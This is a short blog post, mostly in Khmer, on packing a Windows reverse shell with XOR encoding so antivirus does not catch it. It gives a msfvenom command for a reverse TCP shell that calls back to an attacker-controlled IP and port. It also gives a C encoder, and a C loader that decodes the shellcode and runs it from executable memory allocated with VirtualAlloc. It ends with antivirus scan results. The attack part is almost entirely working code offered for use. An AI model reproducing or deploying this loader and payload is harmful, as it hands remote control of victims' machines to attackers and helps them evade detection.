This page looks best with JavaScript enabled

Encrypting Shellcode with XOR In C

 ·  β˜• 1 min read  ·  🐱 thik

Summary

αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αž‡αžΆαž€αžΆαžšαž”αž„αŸ’αž€αžΎαž Shellcode αž“αž·αž„αž’αŸ’αžœαžΎαž€αžΌαžŠαž“αžΈαž™αž€αž˜αŸ’αž˜ XOR αžŠαžΎαž˜αŸ’αž”αžΈαž”αž‰αŸ’αž…αŸ€αžŸαž–αžΈαž€αžΆαžšαžšαž€αžƒαžΎαž‰αžšαž”αžŸαŸ‹αž€αž˜αŸ’αž˜αžœαž·αž’αžΈαž€αŸ†αž…αžΆαžαŸ‹αž˜αŸαžšαŸ„αž‚ αŸ”

Generate Shellcode

αžαžΆαž„αž€αŸ’αžšαŸ„αž˜αž‡αžΆαžŠαŸ†αžŽαžΎαžšαž€αžΆαžšαž”αž„αŸ’αž€αžΎαž Payload αžŠαŸ„αž™αž”αŸ’αžšαžΎαž”αŸ’αžšαžΆαžŸαŸ‹ Shellcode αž‡αžΆαž—αžΆαžŸαžΆαžš C αž‚αŸ„αž›αžŠαŸ…αž“αŸ…αž›αžΎαž˜αŸ‰αžΆαžŸαŸŠαžΈαž“ 64 bit αŸ”

1
msfvenom -p windows/x64/shell_reverse_tcp lhost=192.168.60.136 lport=4433 -f c

Create XOR Encryption

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
#include <stdio.h>
unsigned char code[] = 
"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x48\x3\xd2\x65\x48\[Original Shellcode]\x8b\x52\x18\x48"
"\xff\xe7\x58\x6a\x00\x59\x49\xc7\xc2\xf0\xb5\xa2\x56\xff\xd5";
int main()
{
 char key = 'K'; // RIGHT
 // char key = "K"; // WRONG
 int i = 0;
 for (i; i<sizeof(code); i++)
 {
  printf("\\x%02x",code[i]^key);
 }
}

Compile αž€αžΌαžŠαžαžΆαž„αž›αžΎαž“αŸ„αŸ‡αž™αžΎαž„αž“αžΉαž„αž‘αž‘αž½αž›αž”αžΆαž“ Encryption Strings αžαŸ’αž˜αžΈαž˜αž½αž™ αžŸαžΌαž˜αž…αž˜αŸ’αž›αž„αžœαžΆαž‘αž»αž€αžŠαžΎαž˜αŸ’αž”αžΈαžŠαžΆαž€αŸ‹αž…αžΌαž›αž‘αŸ…αž€αŸ’αž“αž»αž„αž€αžΌαžŠαžαžΆαž„αž€αŸ’αžšαŸ„αž˜αžŠαžΎαž˜αŸ’αž”αžΈ Decrypt αž€αžΌαžŠαžαžΆαž„αž›αžΎ αŸ”

Create XOR Decryption

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
#include <stdio.h>
#include <windows.h>
unsigned char code[] = "\xb7\x03\xc8\xaf\[Decrypted Shellcode]\xa3\x87\x4b\x4b\x4b";
int main()
{
  char key = 'K';
  int i = 0;
  for (i; i<sizeof(code) - 1; i++)
{
  code[i] = code[i]^key;
}

  void *exec = VirtualAlloc(0, sizeof code, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  memcpy(exec, code, sizeof code);
  ((void(*)())exec)();
  return 0;
}

Compile Payload αžαžΆαž„αž›αžΎαž“αŸ„αŸ‡αž™αžΎαž„αž“αžΉαž„αž‘αž‘αž½αž›αž”αžΆαž“ Payload αž…αž»αž„αž€αŸ’αžšαŸ„αž™ αŸ•

AV Scan Results

Scan Result

AV Scan Results

αžαŸ†αžŽαžšαž—αŸ’αž‡αžΆαž”αŸ‹αŸ– ANTISCAN.ME
αžŸαž˜αŸ’αžšαž„αŸ‹αž…αŸαž‰αž–αžΈαŸ– MEDIUM

Share on

Thik
WRITTEN BY
thik
Security Researcher